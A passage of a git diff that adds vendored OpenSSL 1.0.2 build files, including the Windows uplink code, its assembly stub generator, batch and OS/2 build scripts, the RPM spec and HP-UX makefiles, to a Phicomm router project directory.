+#endif
+
+#include <windows.h>
+#include <tchar.h>
+#include <stdio.h>
+#include "uplink.h"
+void OPENSSL_showfatal(const char *, ...);
+
+static TCHAR msg[128];
+
+static void unimplemented(void)
+{
+    OPENSSL_showfatal(sizeof(TCHAR) == sizeof(char) ? "%s\n" : "%S\n", msg);
+    ExitProcess(1);
+}
+
+void OPENSSL_Uplink(volatile void **table, int index)
+{
+    static HMODULE volatile apphandle = NULL;
+    static void **volatile applinktable = NULL;
+    int len;
+    void (*func) (void) = unimplemented;
+    HANDLE h;
+    void **p;
+
+    /*
+     * Note that the below code is not MT-safe in respect to msg buffer, but
+     * what's the worst thing that can happen? Error message might be
+     * misleading or corrupted. As error condition is fatal and should never
+     * be risen, I accept the risk...
+     */
+    /*
+     * One can argue that I should have used InterlockedExchangePointer or
+     * something to update static variables and table[]. Well, store
+     * instructions are as atomic as they can get and assigned values are
+     * effectively constant... So that volatile qualifier should be
+     * sufficient [it prohibits compiler to reorder memory access
+     * instructions].
+     */
+    do {
+        len = _sntprintf(msg, sizeof(msg) / sizeof(TCHAR),
+                         _T("OPENSSL_Uplink(%p,%02X): "), table, index);
+        _tcscpy(msg + len, _T("unimplemented function"));
+
+        if ((h = apphandle) == NULL) {
+            if ((h = GetModuleHandle(NULL)) == NULL) {
+                apphandle = (HMODULE) - 1;
+                _tcscpy(msg + len, _T("no host application"));
+                break;
+            }
+            apphandle = h;
+        }
+        if ((h = apphandle) == (HMODULE) - 1) /* revalidate */
+            break;
+
+        if (applinktable == NULL) {
+            void **(*applink) ();
+
+            applink = (void **(*)())GetProcAddress(h, "OPENSSL_Applink");
+            if (applink == NULL) {
+                apphandle = (HMODULE) - 1;
+                _tcscpy(msg + len, _T("no OPENSSL_Applink"));
+                break;
+            }
+            p = (*applink) ();
+            if (p == NULL) {
+                apphandle = (HMODULE) - 1;
+                _tcscpy(msg + len, _T("no ApplinkTable"));
+                break;
+            }
+            applinktable = p;
+        } else
+            p = applinktable;
+
+        if (index > (int)p[0])
+            break;
+
+        if (p[index])
+            func = p[index];
+    } while (0);
+
+    table[index] = func;
+}
+
+#if defined(_MSC_VER) && defined(_M_IX86) && !defined(OPENSSL_NO_INLINE_ASM)
+# define LAZY(i)         \
+__declspec(naked) static void lazy##i (void) {  \
+        _asm    push i                          \
+        _asm    push OFFSET OPENSSL_UplinkTable \
+        _asm    call OPENSSL_Uplink             \
+        _asm    add  esp,8                      \
+        _asm    jmp  OPENSSL_UplinkTable+4*i    }
+
+# if APPLINK_MAX>25
+#  error "Add more stubs..."
+# endif
+/* make some in advance... */
+LAZY(1) LAZY(2) LAZY(3) LAZY(4) LAZY(5)
+    LAZY(6) LAZY(7) LAZY(8) LAZY(9) LAZY(10)
+    LAZY(11) LAZY(12) LAZY(13) LAZY(14) LAZY(15)
+    LAZY(16) LAZY(17) LAZY(18) LAZY(19) LAZY(20)
+    LAZY(21) LAZY(22) LAZY(23) LAZY(24) LAZY(25)
+void *OPENSSL_UplinkTable[] = {
+    (void *)APPLINK_MAX,
+    lazy1, lazy2, lazy3, lazy4, lazy5,
+    lazy6, lazy7, lazy8, lazy9, lazy10,
+    lazy11, lazy12, lazy13, lazy14, lazy15,
+    lazy16, lazy17, lazy18, lazy19, lazy20,
+    lazy21, lazy22, lazy23, lazy24, lazy25,
+};
+#endif
+
+#ifdef SELFTEST
+main()
+{
+    UP_fprintf(UP_stdout, "hello, world!\n");
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.h
new file mode 100644
index 0000000..4881ba7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.h
@@ -0,0 +1,29 @@
+#define APPMACROS_ONLY
+#include "applink.c"
+
+extern void *OPENSSL_UplinkTable[];
+
+#define UP_stdin  (*(void *(*)(void))OPENSSL_UplinkTable[APPLINK_STDIN])()
+#define UP_stdout (*(void *(*)(void))OPENSSL_UplinkTable[APPLINK_STDOUT])()
+#define UP_stderr (*(void *(*)(void))OPENSSL_UplinkTable[APPLINK_STDERR])()
+#define UP_fprintf (*(int (*)(void *,const char *,...))OPENSSL_UplinkTable[APPLINK_FPRINTF])
+#define UP_fgets  (*(char *(*)(char *,int,void *))OPENSSL_UplinkTable[APPLINK_FGETS])
+#define UP_fread  (*(size_t (*)(void *,size_t,size_t,void *))OPENSSL_UplinkTable[APPLINK_FREAD])
+#define UP_fwrite (*(size_t (*)(const void *,size_t,size_t,void *))OPENSSL_UplinkTable[APPLINK_FWRITE])
+#define UP_fsetmod (*(int (*)(void *,char))OPENSSL_UplinkTable[APPLINK_FSETMOD])
+#define UP_feof   (*(int (*)(void *))OPENSSL_UplinkTable[APPLINK_FEOF])
+#define UP_fclose (*(int (*)(void *))OPENSSL_UplinkTable[APPLINK_FCLOSE])
+
+#define UP_fopen  (*(void *(*)(const char *,const char *))OPENSSL_UplinkTable[APPLINK_FOPEN])
+#define UP_fseek  (*(int (*)(void *,long,int))OPENSSL_UplinkTable[APPLINK_FSEEK])
+#define UP_ftell  (*(long (*)(void *))OPENSSL_UplinkTable[APPLINK_FTELL])
+#define UP_fflush (*(int (*)(void *))OPENSSL_UplinkTable[APPLINK_FFLUSH])
+#define UP_ferror (*(int (*)(void *))OPENSSL_UplinkTable[APPLINK_FERROR])
+#define UP_clearerr (*(void (*)(void *))OPENSSL_UplinkTable[APPLINK_CLEARERR])
+#define UP_fileno (*(int (*)(void *))OPENSSL_UplinkTable[APPLINK_FILENO])
+
+#define UP_open   (*(int (*)(const char *,int,...))OPENSSL_UplinkTable[APPLINK_OPEN])
+#define UP_read   (*(ossl_ssize_t (*)(int,void *,size_t))OPENSSL_UplinkTable[APPLINK_READ])
+#define UP_write  (*(ossl_ssize_t (*)(int,const void *,size_t))OPENSSL_UplinkTable[APPLINK_WRITE])
+#define UP_lseek  (*(long (*)(int,long,int))OPENSSL_UplinkTable[APPLINK_LSEEK])
+#define UP_close  (*(int (*)(int))OPENSSL_UplinkTable[APPLINK_CLOSE])
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.pl
new file mode 100755
index 0000000..102400e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.pl
@@ -0,0 +1,204 @@
+#!/usr/bin/env perl
+#
+# For Microsoft CL this is implemented as inline assembler. So that
+# even though this script can generate even Win32 code, we'll be
+# using it primarily to generate Win64 modules. Both IA-64 and AMD64
+# are supported...
+
+# pull APPLINK_MAX value from applink.c...
+$applink_c=$0;
+$applink_c=~s|[^/\\]+$||g;
+$applink_c.="applink.c";
+open(INPUT,$applink_c) || die "can't open $applink_c: $!";
+@max=grep {/APPLINK_MAX\s+(\d+)/} <INPUT>;
+close(INPUT);
+($#max==0) or die "can't find APPLINK_MAX in $applink_c";
+
+$max[0]=~/APPLINK_MAX\s+(\d+)/;
+$N=$1;	# number of entries in OPENSSL_UplinkTable not including
+	# OPENSSL_UplinkTable[0], which contains this value...
+
+# Idea is to fill the OPENSSL_UplinkTable with pointers to stubs
+# which invoke 'void OPENSSL_Uplink (ULONG_PTR *table,int index)';
+# and then dereference themselves. Latter shall result in endless
+# loop *unless* OPENSSL_Uplink does not replace 'table[index]' with
+# something else, e.g. as 'table[index]=unimplemented;'...
+
+$arg = shift;
+#( defined shift || open STDOUT,">$arg" ) || die "can't open $arg: $!";
+
+if ($arg =~ /win32n/)	{ ia32nasm();  }
+elsif ($arg =~ /win32/)	{ ia32masm();  }
+elsif ($arg =~ /coff/)	{ ia32gas();   }
+elsif ($arg =~ /win64i/ or $arg =~ /ia64/)	{ ia64ias();   }
+elsif ($arg =~ /win64a/ or $arg =~ /amd64/)	{ amd64masm(); }
+else	{ die "nonsense $arg"; }
+
+sub ia32gas() {
+print <<___;
+.text
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+.def	.Lazy$i;	.scl	3;	.type	32;	.endef
+.align	4
+.Lazy$i:
+	pushl	\$$i
+	pushl	\$_OPENSSL_UplinkTable
+	call	_OPENSSL_Uplink
+	addl	\$8,%esp
+	jmp	*(_OPENSSL_UplinkTable+4*$i)
+___
+}
+print <<___;
+.data
+.align	4
+.globl  _OPENSSL_UplinkTable
+_OPENSSL_UplinkTable:
+	.long	$N
+___
+for ($i=1;$i<=$N;$i++) {   print "	.long	.Lazy$i\n";   }
+}
+
+sub ia32masm() {
+print <<___;
+.386P
+.model	FLAT
+
+_DATA	SEGMENT
+PUBLIC	_OPENSSL_UplinkTable
+_OPENSSL_UplinkTable	DD	$N	; amount of following entries
+___
+for ($i=1;$i<=$N;$i++) {   print "	DD	FLAT:\$lazy$i\n";   }
+print <<___;
+_DATA	ENDS
+
+_TEXT	SEGMENT
+EXTRN	_OPENSSL_Uplink:NEAR
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+ALIGN	4
+\$lazy$i	PROC NEAR
+	push	$i
+	push	OFFSET FLAT:_OPENSSL_UplinkTable
+	call	_OPENSSL_Uplink
+	add	esp,8
+	jmp	DWORD PTR _OPENSSL_UplinkTable+4*$i
+\$lazy$i	ENDP
+___
+}
+print <<___;
+ALIGN	4
+_TEXT	ENDS
+END
+___
+}
+
+sub ia32nasm() {
+print <<___;
+SEGMENT	.data
+GLOBAL	_OPENSSL_UplinkTable
+_OPENSSL_UplinkTable	DD	$N	; amount of following entries
+___
+for ($i=1;$i<=$N;$i++) {   print "	DD	\$lazy$i\n";   }
+print <<___;
+
+SEGMENT	.text
+EXTERN	_OPENSSL_Uplink
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+ALIGN	4
+\$lazy$i:
+	push	$i
+	push	_OPENSSL_UplinkTable
+	call	_OPENSSL_Uplink
+	add	esp,8
+	jmp	[_OPENSSL_UplinkTable+4*$i]
+___
+}
+print <<___;
+ALIGN	4
+END
+___
+}
+
+sub ia64ias () {
+local $V=8;	# max number of args uplink functions may accept...
+print <<___;
+.data
+.global	OPENSSL_UplinkTable#
+OPENSSL_UplinkTable:	data8	$N	// amount of following entries
+___
+for ($i=1;$i<=$N;$i++) {   print "	data8	\@fptr(lazy$i#)\n";   }
+print <<___;
+.size	OPENSSL_UplinkTable,.-OPENSSL_UplinkTable#
+
+.text
+.global	OPENSSL_Uplink#
+.type	OPENSSL_Uplink#,\@function
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+.proc	lazy$i
+lazy$i:
+{ .mii;	alloc	loc0=ar.pfs,$V,3,2,0
+	mov	loc1=b0
+	addl	loc2=\@ltoff(OPENSSL_UplinkTable#),gp	};;
+{ .mmi;	ld8	out0=[loc2]
+	mov	out1=$i					};;
+{ .mib;	adds	loc2=8*$i,out0
+	br.call.sptk.many	b0=OPENSSL_Uplink#	};;
+{ .mmi;	ld8	r31=[loc2];;
+	ld8	r30=[r31],8				};;
+{ .mii;	ld8	gp=[r31]
+	mov	b6=r30
+	mov	b0=loc1					};;
+{ .mib; mov	ar.pfs=loc0
+	br.many	b6					};;
+.endp	lazy$i#
+___
+}
+}
+
+sub amd64masm() {
+print <<___;
+_DATA	SEGMENT
+PUBLIC	OPENSSL_UplinkTable
+OPENSSL_UplinkTable	DQ	$N
+___
+for ($i=1;$i<=$N;$i++) {   print "	DQ	\$lazy$i\n";   }
+print <<___;
+_DATA	ENDS
+
+_TEXT	SEGMENT
+EXTERN	OPENSSL_Uplink:PROC
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+ALIGN	4
+\$lazy$i	PROC
+	push	r9
+	push	r8
+	push	rdx
+	push	rcx
+	sub	rsp,40
+	lea	rcx,OFFSET OPENSSL_UplinkTable
+	mov	rdx,$i
+	call	OPENSSL_Uplink
+	add	rsp,40
+	pop	rcx
+	pop	rdx
+	pop	r8
+	pop	r9
+	jmp	QWORD PTR OPENSSL_UplinkTable+8*$i
+\$lazy$i	ENDP
+___
+}
+print <<___;
+_TEXT	ENDS
+END
+___
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/x86asm.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/x86asm.bat
new file mode 100755
index 0000000..03563c6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/x86asm.bat
@@ -0,0 +1,57 @@
+
+@echo off
+echo Generating x86 assember
+
+echo Bignum
+cd crypto\bn\asm
+perl x86.pl win32n > bn-win32.asm
+cd ..\..\..
+
+echo DES
+cd crypto\des\asm
+perl des-586.pl win32n > d-win32.asm
+cd ..\..\..
+
+echo "crypt(3)"
+
+cd crypto\des\asm
+perl crypt586.pl win32n > y-win32.asm
+cd ..\..\..
+
+echo Blowfish
+
+cd crypto\bf\asm
+perl bf-586.pl win32n > b-win32.asm
+cd ..\..\..
+
+echo CAST5
+cd crypto\cast\asm
+perl cast-586.pl win32n > c-win32.asm
+cd ..\..\..
+
+echo RC4
+cd crypto\rc4\asm
+perl rc4-586.pl win32n > r4-win32.asm
+cd ..\..\..
+
+echo MD5
+cd crypto\md5\asm
+perl md5-586.pl win32n > m5-win32.asm
+cd ..\..\..
+
+echo SHA1
+cd crypto\sha\asm
+perl sha1-586.pl win32n > s1-win32.asm
+cd ..\..\..
+
+echo RIPEMD160
+cd crypto\ripemd\asm
+perl rmd-586.pl win32n > rm-win32.asm
+cd ..\..\..
+
+echo RC5\32
+cd crypto\rc5\asm
+perl rc5-586.pl win32n > r5-win32.asm
+cd ..\..\..
+
+echo on
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/openssl.doxy b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/openssl.doxy
new file mode 100644
index 0000000..479c311
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/openssl.doxy
@@ -0,0 +1,7 @@
+PROJECT_NAME=OpenSSL
+GENERATE_LATEX=no
+OUTPUT_DIRECTORY=doxygen
+INPUT=ssl include
+FILE_PATTERNS=*.c *.h
+RECURSIVE=yes
+PREDEFINED=DOXYGEN
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/openssl.spec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/openssl.spec
new file mode 100644
index 0000000..c90dc69
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/openssl.spec
@@ -0,0 +1,209 @@
+%define _unpackaged_files_terminate_build 0
+
+Release: 1
+
+%define openssldir /var/ssl
+
+Summary: Secure Sockets Layer and cryptography libraries and tools
+Name: openssl
+Version: 1.0.2
+Source0: ftp://ftp.openssl.org/source/%{name}-%{version}.tar.gz
+License: OpenSSL
+Group: System Environment/Libraries
+Provides: SSL
+URL: http://www.openssl.org/
+Packager: Damien Miller <djm@mindrot.org>
+BuildRoot:   /var/tmp/%{name}-%{version}-root
+
+%description
+The OpenSSL Project is a collaborative effort to develop a robust,
+commercial-grade, fully featured, and Open Source toolkit implementing the
+Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1)
+protocols as well as a full-strength general purpose cryptography library.
+The project is managed by a worldwide community of volunteers that use the
+Internet to communicate, plan, and develop the OpenSSL tookit and its related
+documentation. 
+
+OpenSSL is based on the excellent SSLeay library developed from Eric A.
+Young and Tim J. Hudson.  The OpenSSL toolkit is licensed under an
+Apache-style licence, which basically means that you are free to get and
+use it for commercial and non-commercial purposes. 
+
+This package contains the base OpenSSL cryptography and SSL/TLS 
+libraries and tools.
+
+%package devel
+Summary: Secure Sockets Layer and cryptography static libraries and headers
+Group: Development/Libraries
+Requires: openssl
+%description devel
+The OpenSSL Project is a collaborative effort to develop a robust,
+commercial-grade, fully featured, and Open Source toolkit implementing the
+Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1)
+protocols as well as a full-strength general purpose cryptography library.
+The project is managed by a worldwide community of volunteers that use the
+Internet to communicate, plan, and develop the OpenSSL tookit and its related
+documentation. 
+
+OpenSSL is based on the excellent SSLeay library developed from Eric A.
+Young and Tim J. Hudson.  The OpenSSL toolkit is licensed under an
+Apache-style licence, which basically means that you are free to get and
+use it for commercial and non-commercial purposes. 
+
+This package contains the the OpenSSL cryptography and SSL/TLS 
+static libraries and header files required when developing applications.
+
+%package doc
+Summary: OpenSSL miscellaneous files
+Group: Documentation
+Requires: openssl
+%description doc
+The OpenSSL Project is a collaborative effort to develop a robust,
+commercial-grade, fully featured, and Open Source toolkit implementing the
+Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1)
+protocols as well as a full-strength general purpose cryptography library.
+The project is managed by a worldwide community of volunteers that use the
+Internet to communicate, plan, and develop the OpenSSL tookit and its related
+documentation. 
+
+OpenSSL is based on the excellent SSLeay library developed from Eric A.
+Young and Tim J. Hudson.  The OpenSSL toolkit is licensed under an
+Apache-style licence, which basically means that you are free to get and
+use it for commercial and non-commercial purposes. 
+
+This package contains the the OpenSSL cryptography and SSL/TLS extra
+documentation and POD files from which the man pages were produced.
+
+%prep
+
+%setup -q
+
+%build 
+
+%define CONFIG_FLAGS -DSSL_ALLOW_ADH --prefix=/usr --openssldir=%{openssldir}
+
+perl util/perlpath.pl /usr/bin/perl
+
+%ifarch i386 i486 i586 i686
+./Configure %{CONFIG_FLAGS} linux-elf shared
+%endif
+%ifarch ppc
+./Configure %{CONFIG_FLAGS} linux-ppc shared
+%endif
+%ifarch alpha
+./Configure %{CONFIG_FLAGS} linux-alpha shared
+%endif
+%ifarch x86_64
+./Configure %{CONFIG_FLAGS} linux-x86_64 shared
+%endif
+LD_LIBRARY_PATH=`pwd` make
+LD_LIBRARY_PATH=`pwd` make rehash
+LD_LIBRARY_PATH=`pwd` make test
+
+%install
+rm -rf $RPM_BUILD_ROOT
+make MANDIR=/usr/man MANSUFFIX=ssl INSTALL_PREFIX="$RPM_BUILD_ROOT" install
+
+# Make backwards-compatibility symlink to ssleay
+ln -sf /usr/bin/openssl $RPM_BUILD_ROOT/usr/bin/ssleay
+
+%clean
+rm -rf $RPM_BUILD_ROOT
+
+%files 
+%defattr(0644,root,root,0755)
+%doc CHANGES CHANGES.SSLeay LICENSE NEWS README
+
+%attr(0755,root,root) /usr/bin/*
+%attr(0755,root,root) /usr/lib/*.so*
+%attr(0755,root,root) %{openssldir}/misc/*
+%attr(0644,root,root) /usr/man/man[157]/*
+
+%config %attr(0644,root,root) %{openssldir}/openssl.cnf 
+%dir %attr(0755,root,root) %{openssldir}/certs
+%dir %attr(0755,root,root) %{openssldir}/misc
+%dir %attr(0750,root,root) %{openssldir}/private
+
+%files devel
+%defattr(0644,root,root,0755)
+%doc CHANGES CHANGES.SSLeay LICENSE NEWS README
+
+%attr(0644,root,root) /usr/lib/*.a
+%attr(0644,root,root) /usr/lib/pkgconfig/openssl.pc
+%attr(0644,root,root) /usr/include/openssl/*
+%attr(0644,root,root) /usr/man/man[3]/*
+
+%files doc
+%defattr(0644,root,root,0755)
+%doc CHANGES CHANGES.SSLeay LICENSE NEWS README
+%doc doc
+
+%post
+ldconfig
+
+%postun
+ldconfig
+
+%changelog
+* Sun Jun  6 2005 Richard Levitte <richard@levitte.org>
+- Remove the incorrect installation of '%{openssldir}/lib'.
+* Wed May  7 2003 Richard Levitte <richard@levitte.org>
+- Add /usr/lib/pkgconfig/openssl.pc to the development section.
+* Thu Mar 22 2001 Richard Levitte <richard@levitte.org>
+- Removed redundant subsection that re-installed libcrypto.a and libssl.a
+  as well.  Also remove RSAref stuff completely, since it's not needed
+  any more.
+* Thu Mar 15 2001 Jeremiah Johnson <jjohnson@penguincomputing.com>
+- Removed redundant subsection that re-installed libcrypto.so.0.9.6 and
+  libssl.so.0.9.6.  As well as the subsection that created symlinks for
+  these.  make install handles all this.
+* Sat Oct 21 2000 Horms <horms@vergenet.net>
+- Make sure symlinks are created by using -f flag to ln.
+  Otherwise some .so libraries are copied rather than
+  linked in the resulting binary RPM. This causes the package
+  to be larger than neccessary and makes ldconfig complain.
+* Fri Oct 13 2000 Horms <horms@vergenet.net>
+- Make defattr is set for files in all packages so packages built as
+  non-root will still be installed with files owned by root.
+* Thu Sep 14 2000 Richard Levitte <richard@levitte.org>
+- Changed to adapt to the new (supported) way of making shared libraries
+- Installs all static libraries, not just libRSAglue.a
+- Extra documents now end up in a separate document package
+* Sun Feb 27 2000 Damien Miller <djm@mindrot.org>
+- Merged patches to spec
+- Updated to 0.9.5beta2 (now with manpages)
+* Sat Feb  5 2000 Michal Jaegermann <michal@harddata.com>
+- added 'linux-alpha' to configuration
+- fixed nasty absolute links
+* Tue Jan 25 2000 Bennett Todd <bet@rahul.net>
+- Added -DSSL_ALLOW_ADH, bumped Release to 4
+* Thu Oct 14 1999 Damien Miller <djm@mindrot.org>
+- Set default permissions
+- Removed documentation from devel sub-package
+* Thu Sep 30 1999 Damien Miller <djm@mindrot.org>
+- Added "make test" stage
+- GPG signed
+* Tue Sep 10 1999 Damien Miller <damien@ibs.com.au>
+- Updated to version 0.9.4
+* Tue May 25 1999 Damien Miller <damien@ibs.com.au>
+- Updated to version 0.9.3
+- Added attributes for all files
+- Paramatised openssl directory
+* Sat Mar 20 1999 Carlo M. Arenas Belon <carenas@jmconsultores.com.pe>
+- Added "official" bnrec patch and taking other out
+- making a link from ssleay to openssl binary
+- putting all changelog together on SPEC file
+* Fri Mar  5 1999 Henri Gomez <gomez@slib.fr>
+- Added bnrec patch
+* Tue Dec 29 1998 Jonathan Ruano <kobalt@james.encomix.es>
+- minimum spec and patches changes for openssl
+- modified for openssl sources
+* Sat Aug  8 1998 Khimenko Victor <khim@sch57.msk.ru>
+- shared library creating process honours $RPM_OPT_FLAGS
+- shared libarry supports threads (as well as static library)
+* Wed Jul 22 1998 Khimenko Victor <khim@sch57.msk.ru>
+- building of shared library completely reworked
+* Tue Jul 21 1998 Khimenko Victor <khim@sch57.msk.ru>
+- RPM is BuildRoot'ed
+* Tue Feb 10 1998 Khimenko Victor <khim@sch57.msk.ru>
+- all stuff is moved out of /usr/local
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/os2/OS2-EMX.cmd b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/os2/OS2-EMX.cmd
new file mode 100644
index 0000000..5924b50
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/os2/OS2-EMX.cmd
@@ -0,0 +1,102 @@
+@echo off
+
+perl Configure OS2-EMX
+perl util\mkfiles.pl > MINFO
+
+@rem create make file
+perl util\mk1mf.pl OS2-EMX > OS2-EMX.mak
+perl util\mk1mf.pl dll OS2-EMX > OS2-EMX-DLL.mak
+
+echo Generating export definition files
+perl util\mkdef.pl crypto OS2 > os2\crypto.def
+perl util\mkdef.pl ssl OS2 > os2\ssl.def
+
+echo Generating x86 for GNU assember
+
+echo Bignum
+cd crypto\bn\asm
+rem perl x86.pl a.out > bn-os2.asm
+perl bn-586.pl a.out > bn-os2.asm 
+perl co-586.pl a.out > co-os2.asm 
+cd ..\..\..
+
+echo DES
+cd crypto\des\asm
+perl des-586.pl a.out > d-os2.asm
+cd ..\..\..
+
+echo crypt(3)
+cd crypto\des\asm
+perl crypt586.pl a.out > y-os2.asm
+cd ..\..\..
+
+echo Blowfish
+cd crypto\bf\asm
+perl bf-586.pl a.out > b-os2.asm
+cd ..\..\..
+
+echo CAST5
+cd crypto\cast\asm
+perl cast-586.pl a.out > c-os2.asm
+cd ..\..\..
+
+echo RC4
+cd crypto\rc4\asm
+perl rc4-586.pl a.out > r4-os2.asm
+cd ..\..\..
+
+echo MD5
+cd crypto\md5\asm
+perl md5-586.pl a.out > m5-os2.asm
+cd ..\..\..
+
+echo SHA1
+cd crypto\sha\asm
+perl sha1-586.pl a.out > s1-os2.asm
+cd ..\..\..
+
+echo RIPEMD160
+cd crypto\ripemd\asm
+perl rmd-586.pl a.out > rm-os2.asm
+cd ..\..\..
+
+echo RC5\32
+cd crypto\rc5\asm
+perl rc5-586.pl a.out > r5-os2.asm
+cd ..\..\..
+
+cd os2
+
+if exist noname\backward_ssl.def goto nomkdir
+mkdir noname
+:nomkdir
+
+perl backwardify.pl		crypto.def	>backward_crypto.def
+perl backwardify.pl		ssl.def		>backward_ssl.def
+perl backwardify.pl -noname	crypto.def	>noname\backward_crypto.def
+perl backwardify.pl -noname	ssl.def		>noname\backward_ssl.def
+
+echo Creating backward compatibility forwarder dlls:
+echo  crypto.dll
+gcc -Zomf -Zdll -Zcrtdll -o crypto.dll backward_crypto.def 2>&1 | grep -v L4085
+echo  ssl.dll
+gcc -Zomf -Zdll -Zcrtdll -o ssl.dll backward_ssl.def 2>&1 | grep -v L4085
+
+echo Creating smaller backward compatibility forwarder dlls:
+echo These DLLs are not good for runtime resolution of symbols.
+echo  noname\crypto.dll
+gcc -Zomf -Zdll -Zcrtdll -o noname/crypto.dll noname/backward_crypto.def 2>&1 | grep -v L4085
+echo  noname\ssl.dll
+gcc -Zomf -Zdll -Zcrtdll -o noname/ssl.dll noname/backward_ssl.def 2>&1 | grep -v L4085
+
+echo Compressing forwarders (it is ok if lxlite is not found):
+lxlite *.dll noname/*.dll
+
+cd ..
+
+echo Now run:
+echo For static build:
+echo  make -f OS2-EMX.mak
+echo For dynamic build:
+echo  make -f OS2-EMX-DLL.mak
+echo then rename crypto.dll to cryptssl.dll, ssl.dll to open_ssl.dll
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/os2/backwardify.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/os2/backwardify.pl
new file mode 100644
index 0000000..272423c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/os2/backwardify.pl
@@ -0,0 +1,32 @@
+#!/usr/bin/perl -w
+use strict;
+
+# Use as $0
+# Use as $0 -noname
+
+my $did_library;
+my $did_description;
+my $do_exports;
+my @imports;
+my $noname = (@ARGV and $ARGV[0] eq '-noname' and shift);
+while (<>) {
+  unless ($did_library) {
+    s/\b(cryptssl)\b/crypto/ and $did_library = $1 if /^LIBRARY\s+cryptssl\b/;
+    s/\b(open_ssl)\b/ssl/    and $did_library = $1 if /^LIBRARY\s+open_ssl\b/;
+  }
+  unless ($did_description) {
+    s&^(DESCRIPTION\s+(['"])).*&${1}\@#www.openssl.org/:#\@forwarder DLL for pre-0.9.7c+ OpenSSL to the new dll naming scheme$2& and $did_description++;
+  }
+  if ($do_exports) {{
+    last unless /\S/;
+    warn, last unless /^ \s* ( \w+ ) \s+ \@(\d+)\s*$/x;
+    push @imports, [$1, $2];
+    s/$/ NONAME/ if $noname;
+  }}
+  $do_exports++ if not $do_exports and /^EXPORTS/;
+  print $_;
+}
+print "IMPORTS\n";
+for my $imp (@imports) {
+  print "\t$imp->[0]=$did_library.$imp->[1]\n";
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/Makefile.hpux10-cc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/Makefile.hpux10-cc
new file mode 100644
index 0000000..89c28dc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/Makefile.hpux10-cc
@@ -0,0 +1,34 @@
+# Makefile.hpux-cc
+
+major=0.9.8
+
+slib=libssl
+sh_slib=$(slib).sl.$(major)
+
+clib=libcrypto
+sh_clib=$(clib).sl.$(major)
+
+all : $(clib).sl $(slib).sl
+
+
+$(clib)_pic.a : $(clib).a
+	echo "Copying $? to $@"
+	cp -p $? $@
+
+$(slib)_pic.a : $(slib).a
+	echo "Copying $? to $@"
+	cp -p $? $@
+
+$(sh_clib) : $(clib)_pic.a
+	ld -b -s -z +h $@ -o $@ -Fl $(clib)_pic.a -ldld -lc 
+
+$(clib).sl : $(sh_clib)
+	rm -f $@
+	ln -s $? $@
+
+$(sh_slib) : $(slib)_pic.a $(clib).sl
+	ld -b -s -z +h $@ -o $@ -Fl $(slib)_pic.a -ldld -lc
+        
+$(slib).sl : $(sh_slib)
+	rm -f $@
+	ln -s $? $@
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/README
new file mode 100644
index 0000000..fea07a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/README
@@ -0,0 +1 @@
+Only the windows NT and, linux builds have been tested for SSLeay 0.8.0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/hpux10-cc.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/hpux10-cc.sh
new file mode 100644
index 0000000..ceeb8c5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/shlib/hpux10-cc.sh
@@ -0,0 +1,92 @@
+#!/usr/bin/sh
+#
+# Run this script from the OpenSSL root directory:
+# sh shlib/hpux10-cc.sh
+# 
+# HP-UX (10.20) shared library installation:
+# Compile and install OpenSSL with best possible optimization:
+# - shared libraries are compiled and installed with +O4 optimization
+# - executable(s) are compiled and installed with +O4 optimization
+# - static libraries are compiled and installed with +O3 optimization,
+#   to avoid the time consuming +O4 link-time optimization when using
+#   these libraries. (The shared libs are already optimized during build
+#   at +O4.)
+#
+# This script must be run with appropriate privileges to install into
+# /usr/local/ssl. HP-UX prevents used executables and shared libraries
+# from being deleted or overwritten. Stop all processes using already
